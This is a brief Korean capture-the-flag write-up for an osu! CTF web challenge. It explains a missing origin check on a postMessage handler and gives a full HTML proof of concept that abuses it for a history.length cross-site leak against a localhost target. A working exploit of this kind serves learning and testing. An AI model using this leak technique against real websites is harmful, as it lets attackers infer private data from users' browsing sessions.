[Osu! gaming CTF] beatmap list Writeup

처음엔

  if (e.origin !== window.origin && data.identifier !== identifier) return;

이런 코드가 있길래 https://ahmed-tarek.gitbook.io/security-notes/pentesting/wep-pen/owsap-top-10/software-and-data-integrity-failures/postmessage-vulnerabilities/bypassing-sop-with-iframes-part-1 이건줄 알았는데 아니었고

단순히 engine.html 의 engine.js에 저런게 없어가지고 bypass가 되가지고 /engine.html에 postmessage 조지면 됐다 

 

<!DOCTYPE html>
<html>
<head>
  <title>SOP Bypass Test</title>
</head>
<body>
  <p>Check console for logs...</p>
  
  <script>
    // attack 페이지 생성
    const f = document.createElement('iframe');

    f.srcdoc = `
    <!DOCTYPE html>
    <html>
    <body>
      <h2>Malicious iframe (origin: null)</h2>
      <script>
		const sleep = d => new Promise(r => setTimeout(r, d));
		const tryChar = async()=>{
			const w1 = open('http://localhost:8000', '_blank');
			
			//w1[0] 은 engine iframe에보내는거네 ㅅㅂ
			await sleep(500);
			w1[0].postMessage({ 	
			  type: "search",
			  query: "svg"
			}, '*');
			
			await sleep(500);
			w1.location = "about:blank";
			await sleep(500);
			let a = w1.history.length;
			await sleep(500);
			return a;
		}
		(async() => {
			alert(await tryChar());
		})();
      <\/script>
    <\/body>
    <\/html>
`
	document.body.appendChild(f);
  </script>
</body>
</html>

 

대충 history.length xsleak이고 w1[0]은 w1창의 첫번째 iframe에 보낸다는 얘기다

poc코드좀 보고 js 짜는법 연습하자